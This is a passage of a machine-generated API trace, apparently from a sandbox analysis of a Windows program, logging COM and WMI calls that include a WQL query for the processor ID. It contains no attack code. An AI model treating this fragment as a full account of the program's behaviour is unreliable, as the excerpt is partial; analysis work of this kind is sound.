riid=0x7444db1c*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x126b558) returned 0x0 [0064.597] CObjectContext::ContextCallback () returned 0x0 [0064.604] IUnknown:Release (This=0x126b558) returned 0x1 [0064.604] CoUnmarshalInterface (in: pStm=0x12aa788, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xf2ee30 | out: ppv=0xf2ee30*=0x12b3510) returned 0x0 [0064.604] CoMarshalInterface (pStm=0x12aa788, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x12b3510, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0064.605] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2ea50 | out: ppvObject=0xf2ea50*=0x12b3510) returned 0x0 [0064.605] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2ea0c | out: ppvObject=0xf2ea0c*=0x0) returned 0x80004002 [0064.605] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e900 | out: ppvObject=0xf2e900*=0x0) returned 0x80004002 [0064.606] WbemLocator:IUnknown:AddRef (This=0x12b3510) returned 0x3 [0064.606] CoGetContextToken (in: pToken=0xf2e898 | out: pToken=0xf2e898) returned 0x0 [0064.606] CoGetContextToken (in: pToken=0xf2e85c | out: pToken=0xf2e85c) returned 0x0 [0064.606] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e890 | out: ppvObject=0xf2e890*=0x126b49c) returned 0x0 [0064.606] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e8c0 | out: pAptType=0xf2e8c0*=3) returned 0x0 [0064.606] IUnknown:Release (This=0x126b49c) returned 0x0 [0064.606] CoGetObjectContext (in: riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x129bc54 | out: ppv=0x129bc54*=0x126b490) returned 0x0 [0064.606] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e880 | out: ppvObject=0xf2e880*=0x12b346c) returned 0x0 [0064.607] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b346c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e888 | out: pCid=0xf2e888*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0064.607] WbemLocator:IUnknown:Release (This=0x12b346c) returned 0x3 [0064.607] CoGetContextToken (in: pToken=0xf2e890 | out: pToken=0xf2e890) returned 0x0 [0064.607] WbemLocator:IUnknown:AddRef (This=0x12b3510) returned 0x4 [0064.607] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e904 | out: ppvObject=0xf2e904*=0x12b34f4) returned 0x0 [0064.607] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x4 [0064.607] WbemLocator:IRpcOptions:Query (in: This=0x12b34f4, pPrx=0x12b3510, dwProperty=2, pdwValue=0xf2e928 | out: pdwValue=0xf2e928) returned 0x0 [0064.607] WbemLocator:IUnknown:Release (This=0x12b34f4) returned 0x3 [0064.607] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x2 [0064.607] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x1 [0064.607] CoGetContextToken (in: pToken=0xf2e8ec | out: pToken=0xf2e8ec) returned 0x0 [0064.607] WbemLocator:IUnknown:AddRef (This=0x12b3510) returned 0x2 [0064.608] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb90 | out: ppvObject=0xf2eb90*=0x12b34ec) returned 0x0 [0064.608] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x12b34ec, pProxy=0x12b3510, pAuthnSvc=0xf2ebd8, pAuthzSvc=0xf2ebd4, pServerPrincName=0xf2ebe4, pAuthnLevel=0xf2ebdc, pImpLevel=0xf2ebc8, pAuthInfo=0xf2ebcc, pCapabilites=0xf2ebd0 | out: pAuthnSvc=0xf2ebd8*=0xa, pAuthzSvc=0xf2ebd4*=0x0, pServerPrincName=0xf2ebe4, pAuthnLevel=0xf2ebdc*=0x6, pImpLevel=0xf2ebc8*=0x2, pAuthInfo=0xf2ebcc, pCapabilites=0xf2ebd0*=0x1) returned 0x0 [0064.608] WbemLocator:IUnknown:Release (This=0x12b34ec) returned 0x2 [0064.608] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb84 | out: ppvObject=0xf2eb84*=0x12b3510) returned 0x0 [0064.608] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb80 | out: ppvObject=0xf2eb80*=0x12b34ec) returned 0x0 [0064.608] WbemLocator:IClientSecurity:SetBlanket (This=0x12b34ec, pProxy=0x12b3510, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0064.608] WbemLocator:IUnknown:Release (This=0x12b34ec) returned 0x3 [0064.608] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x2 [0064.608] CoTaskMemFree (pv=0x129b798) [0064.608] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x1 [0064.608] SysStringLen (param_1=0x0) returned 0x0 [0064.608] GetLastError () returned 0x0 [0064.608] CoGetContextToken (in: pToken=0xf2ed0c | out: pToken=0xf2ed0c) returned 0x0 [0064.608] CoGetContextToken (in: pToken=0xf2eccc | out: pToken=0xf2eccc) returned 0x0 [0064.608] WbemLocator:IUnknown:AddRef (This=0x12b3510) returned 0x2 [0064.609] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0xf2ed48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xf2ed44 | out: ppvObject=0xf2ed44*=0x1281ef8) returned 0x0 [0064.609] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x2 [0064.609] WbemLocator:IUnknown:Release (This=0x1281ef8) returned 0x1 [0064.609] CoGetContextToken (in: pToken=0xf2e8a0 | out: pToken=0xf2e8a0) returned 0x0 [0064.609] CoGetContextToken (in: pToken=0xf2e860 | out: pToken=0xf2e860) returned 0x0 [0064.609] WbemLocator:IUnknown:AddRef (This=0x12b3510) returned 0x2 [0064.609] WbemLocator:IUnknown:QueryInterface (in: This=0x12b3510, riid=0xf2e8dc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0xf2e8d8 | out: ppvObject=0xf2e8d8*=0x1281ef8) returned 0x0 [0064.609] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x2 [0064.609] WbemLocator:IUnknown:AddRef (This=0x1281ef8) returned 0x3 [0064.610] WbemLocator:IUnknown:QueryInterface (in: This=0x1281ef8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb90 | out: ppvObject=0xf2eb90*=0x12b34ec) returned 0x0 [0064.610] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x12b34ec, pProxy=0x1281ef8, pAuthnSvc=0xf2ebd8, pAuthzSvc=0xf2ebd4, pServerPrincName=0xf2ebe4, pAuthnLevel=0xf2ebdc, pImpLevel=0xf2ebc8, pAuthInfo=0xf2ebcc, pCapabilites=0xf2ebd0 | out: pAuthnSvc=0xf2ebd8*=0xa, pAuthzSvc=0xf2ebd4*=0x0, pServerPrincName=0xf2ebe4, pAuthnLevel=0xf2ebdc*=0x6, pImpLevel=0xf2ebc8*=0x2, pAuthInfo=0xf2ebcc, pCapabilites=0xf2ebd0*=0x1) returned 0x0 [0064.610] WbemLocator:IUnknown:Release (This=0x12b34ec) returned 0x3 [0064.610] WbemLocator:IUnknown:QueryInterface (in: This=0x1281ef8, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb84 | out: ppvObject=0xf2eb84*=0x12b3510) returned 0x0 [0064.610] WbemLocator:IUnknown:QueryInterface (in: This=0x1281ef8, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb80 | out: ppvObject=0xf2eb80*=0x12b34ec) returned 0x0 [0064.610] WbemLocator:IClientSecurity:SetBlanket (This=0x12b34ec, pProxy=0x1281ef8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0064.610] WbemLocator:IUnknown:Release (This=0x12b34ec) returned 0x4 [0064.610] WbemLocator:IUnknown:Release (This=0x12b3510) returned 0x3 [0064.610] CoTaskMemFree (pv=0x129be28) [0064.610] WbemLocator:IUnknown:Release (This=0x1281ef8) returned 0x2 [0064.610] SysStringLen (param_1=0x0) returned 0x0 [0064.610] GetLastError () returned 0x0 [0064.610] CoGetContextToken (in: pToken=0xf2e630 | out: pToken=0xf2e630) returned 0x0 [0064.610] WbemLocator:IUnknown:AddRef (This=0x1281ef8) returned 0x3 [0064.610] IWbemServices:ExecQuery (in: This=0x1281ef8, strQueryLanguage="WQL", strQuery="SELECT ProcessorId FROM Win32_Processor ", lFlags=16, pCtx=0x0, ppEnum=0xf2ec74 | out: ppEnum=0xf2ec74*=0x12b4ee0) returned 0x0 [0064.614] IUnknown:QueryInterface (in: This=0x12b4ee0, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e920 | out: ppvObject=0xf2e920*=0x12b4ee4) returned 0x0 [0064.614] IClientSecurity:QueryBlanket (in: This=0x12b4ee4, pProxy=0x12b4ee0, pAuthnSvc=0xf2e968, pAuthzSvc=0xf2e964, pServerPrincName=0xf2e974, pAuthnLevel=0xf2e96c, pImpLevel=0xf2e958, pAuthInfo=0xf2e95c, pCapabilites=0xf2e960 | out: pAuthnSvc=0xf2e968*=0xa, pAuthzSvc=0xf2e964*=0x0, pServerPrincName=0xf2e974, pAuthnLevel=0xf2e96c*=0x6, pImpLevel=0xf2e958*=0x2, pAuthInfo=0xf2e95c, pCapabilites=0xf2e960*=0x1) returned 0x0 [0064.614] IUnknown:Release (This=0x12b4ee4) returned 0x1 [0064.614] IUnknown:QueryInterface (in: This=0x12b4ee0, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e914 | out: ppvObject=0xf2e914*=0x12b4be0) returned 0x0 [0064.614] IUnknown:QueryInterface (in: This=0x12b4ee0, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e910 | out: ppvObject=0xf2e910*=0x12b4ee4) returned 0x0 [0064.614] IClientSecurity:SetBlanket (This=0x12b4ee4, pProxy=0x12b4ee0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0064.617] IUnknown:Release (This=0x12b4ee4) returned 0x2 [0064.617] WbemLocator:IUnknown:Release (This=0x12b4be0) returned 0x1 [0064.617] CoTaskMemFree (pv=0x129b708) [0064.617] WbemLocator:IUnknown:Release (This=0x1281ef8) returned 0x2 [0064.617] IUnknown:QueryInterface (in: This=0x12b4ee0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2cc | out: ppvObject=0xf2e2cc*=0x12b4be0) returned 0x0 [0064.617] WbemLocator:IUnknown:QueryInterface (in: This=0x12b4be0, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e288 | out: ppvObject=0xf2e288*=0x0) returned 0x80004002 [0064.617] WbemLocator:IUnknown:QueryInterface (in: This=0x12b4be0, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e17c | out: ppvObject=0xf2e17c*=0x0) returned 0x80004002 [0064.618] WbemLocator:IUnknown:AddRef (This=0x12b4be0) returned 0x3 [0064.618] CoGetContextToken (in: pToken=0xf2e114 | out: pToken=0xf2e114) returned 0x0 [0064.618] CoGetContextToken (in: pToken=0xf2e0d8 | out: pToken=0xf2e0d8) returned 0x0 [0064.618] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e10c | out: ppvObject=0xf2e10c*=0x126b49c) returned 0x0 [0064.618] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e13c | out: pAptType=0xf2e13c*=3) returned 0x0 [0064.618] IUnknown:Release (This=0x126b49c) returned 0x1 [0064.619] WbemLocator:IUnknown:QueryInterface (in: This=0x12b4be0, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0fc | out: ppvObject=0xf2e0fc*=0x12b4b3c) returned 0x0 [0064.619] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b4b3c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e104 | out: pCid=0xf2e104*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0064.619] WbemLocator:IUnknown:Release (This=0x12b4b3c) returned 0x3 [0064.619] CoGetContextToken (in: pToken=0xf2e10c | out: pToken=0xf2e10c) returned 0x0 [0064.619] WbemLocator:IUnknown:AddRef (This=0x12b4be0) returned 0x4 [0064.619] WbemLocator:IUnknown:QueryInterface (in: This=0x12b4be0, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e180 | out: ppvObject=0xf2e180*=0x12b4bc4) returned 0x0 [0064.619] WbemLocator:IUnknown:Release (This=0x12b4be0) returned 0x4 [0064.619] WbemLocator:IRpcOptions:Query (in: This=0x12b4bc4, pPrx=0x12b4be0, dwProperty=2, pdwValue=0xf2e1a4 | out: pdwValue=0xf2e1a4) returned 0x80004002 [0064.619] WbemLocator:IUnknown:Release (This=0x12b4bc4) returned 0x3 [0064.619] WbemLocator:IUnknown:Release (This=0x12b4be0) returned 0x2 [0064.619] CoGetContextToken (in: pToken=0xf2e580 | out: pToken=0xf2e580) returned 0x0 [0064.619] CoGetContextToken (in: pToken=0xf2e540 | out: pToken=0xf2e540) returned 0x0 [0064.619] WbemLocator:IUnknown:AddRef (This=0x12b4be0) returned 0x3 [0064.619] WbemLocator:IUnknown:QueryInterface (in: This=0x12b4be0, riid=0xf2e5bc*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2e5b8 | out: ppvObject=0xf2e5b8*=0x12b4ee0) returned 0x0 [0064.619] WbemLocator:IUnknown:Release (This=0x12b4be0) returned 0x3 [0064.620] IUnknown:Release (This=0x12b4ee0) returned 0x2 [0064.620] IUnknown:Release (This=0x12b4ee0) returned 0x1 [0064.620] SysStringLen (param_1=0x0) returned 0x0 [0064.620] GetLastError () returned 0x0 [0064.620] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0064.620] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0064.620] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0064.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x1289cd8) returned 0x0 [0064.620] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0064.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1289cd8, puCount=0xf2ef0c | out: puCount=0xf2ef0c*=0x2) returned 0x0 [0064.620] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0064.620] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0064.620] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0064.620] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0064.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x1289cd8) returned 0x0 [0064.620] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0064.620] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef08*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef08*=0x15, pszText=0x0) returned 0x0 [0064.620] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0064.621] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0064.621] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0064.621] WbemDefPath:IUnknown:AddRef (This=0x1289cd8) returned 0x3 [0064.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x1289cd8, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x1289cd8) returned 0x0 [0064.621] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x3 [0064.621] WbemDefPath:IWbemPath:GetText (in: This=0x1289cd8, lFlags=4, puBuffLength=0xf2ef08*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef08*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0064.621] WbemDefPath:IUnknown:Release (This=0x1289cd8) returned 0x2 [0064.621] CoGetContextToken (in: pToken=0xf2e8a8 | out: pToken=0xf2e8a8) returned 0x0 [0064.621] CoGetContextToken (in: pToken=0xf2e868 | out: pToken=0xf2e868) returned 0x0 [0064.621] WbemLocator:IUnknown:AddRef (This=0x12b4be0) returned 0x2 [0064.621] WbemLocator:IUnknown:QueryInterface (in: This=0x12b4be0, riid=0xf2e8e4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2e8e0 | out: ppvObject=0xf2e8e0*=0x12b4ee0) returned 0x0 [0064.621] WbemLocator:IUnknown:Release (This=0x12b4be0) returned 0x2 [0064.621] IUnknown:AddRef (This=0x12b4ee0) returned 0x3 [0064.621] IEnumWbemClassObject:Clone (in: This=0x12b4ee0, ppEnum=0xf2eedc | out: ppEnum=0xf2eedc*=0x12b7fb0) returned 0x0 [0064.623] IUnknown:QueryInterface (in: This=0x12b7fb0, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb98 | out: ppvObject=0xf2eb98*=0x12b7fb4) returned 0x0 [0064.624] IClientSecurity:QueryBlanket (in: This=0x12b7fb4, pProxy=0x12b7fb0, pAuthnSvc=0xf2ebe0, pAuthzSvc=0xf2ebdc, pServerPrincName=0xf2ebec, pAuthnLevel=0xf2ebe4, pImpLevel=0xf2ebd0, pAuthInfo=0xf2ebd4, pCapabilites=0xf2ebd8 | out: pAuthnSvc=0xf2ebe0*=0xa, pAuthzSvc=0xf2ebdc*=0x0, pServerPrincName=0xf2ebec, pAuthnLevel=0xf2ebe4*=0x6, pImpLevel=0xf2ebd0*=0x2, pAuthInfo=0xf2ebd4, pCapabilites=0xf2ebd8*=0x1) returned 0x0 [0064.624] IUnknown:Release (This=0x12b7fb4) returned 0x1 [0064.624] IUnknown:QueryInterface (in: This=0x12b7fb0, riid=0x73151250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb8c | out: ppvObject=0xf2eb8c*=0x12b6e40) returned 0x0 [0064.624] IUnknown:QueryInterface (in: This=0x12b7fb0, riid=0x73151260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2eb88 | out: ppvObject=0xf2eb88*=0x12b7fb4) returned 0x0 [0064.624] IClientSecurity:SetBlanket (This=0x12b7fb4, pProxy=0x12b7fb0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0064.625] IUnknown:Release (This=0x12b7fb4) returned 0x2 [0064.625] WbemLocator:IUnknown:Release (This=0x12b6e40) returned 0x1 [0064.625] CoTaskMemFree (pv=0x12b7b70) [0064.625] IUnknown:Release (This=0x12b4ee0) returned 0x2 [0064.625] IUnknown:QueryInterface (in: This=0x12b7fb0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e534 | out: ppvObject=0xf2e534*=0x12b6e40) returned 0x0 [0064.625] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e4f0 | out: ppvObject=0xf2e4f0*=0x0) returned 0x80004002 [0064.626] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e3e4 | out: ppvObject=0xf2e3e4*=0x0) returned 0x80004002 [0064.627] WbemLocator:IUnknown:AddRef (This=0x12b6e40) returned 0x3 [0064.627] CoGetContextToken (in: pToken=0xf2e37c | out: pToken=0xf2e37c) returned 0x0 [0064.627] CoGetContextToken (in: pToken=0xf2e340 | out: pToken=0xf2e340) returned 0x0 [0064.627] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e374 | out: ppvObject=0xf2e374*=0x126b49c) returned 0x0 [0064.627] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e3a4 | out: pAptType=0xf2e3a4*=3) returned 0x0 [0064.627] IUnknown:Release (This=0x126b49c) returned 0x1 [0064.627] WbemLocator:IUnknown:QueryInterface (in: This=0x12b6e40, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e364 | out: ppvObject=0xf2e364*=0x12b6d9c) returned 0x0 [0064.627] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b6d9c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e36c | out: pCid=0xf2e36c*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 